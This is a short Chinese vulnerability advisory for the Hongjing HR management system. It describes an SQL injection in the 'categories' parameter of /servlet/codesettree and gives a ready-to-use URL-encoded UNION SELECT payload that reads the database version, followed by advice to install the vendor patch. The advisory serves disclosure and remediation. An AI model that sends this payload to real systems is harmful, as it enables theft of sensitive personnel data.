漏洞说明
宏景人力资源管理系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。
宏景人力资源管理系统 categories处存在SQL注入漏洞,攻击者可以从其中获取数据库敏感信息
影响版本
- 宏景人力资源管理系统
漏洞复现
payload:
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2c~40~40version~2d~2d
# 查询数据库版本
修复建议
安装厂商发布的补丁: http://hjsoft.com.cn/